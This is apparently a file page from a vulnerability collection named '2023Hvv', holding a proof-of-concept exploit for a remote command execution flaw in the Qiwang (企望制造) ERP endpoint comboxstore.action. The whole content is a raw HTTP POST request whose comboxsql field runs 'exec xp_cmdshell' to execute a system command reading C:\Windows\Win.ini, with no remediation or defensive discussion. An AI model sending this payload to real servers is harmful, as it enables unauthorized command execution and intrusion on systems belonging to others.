Projects STRLCPY 2023Hvv Files
🤬
main
ROOT /
企望制造 ERP comboxstore.action 远程命令执行漏洞.md
9 lines | ISO-8859-1 | 187 bytes
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: xxx.xxx.xxx.xxx

comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
Please wait...
Page is in error, reload to recover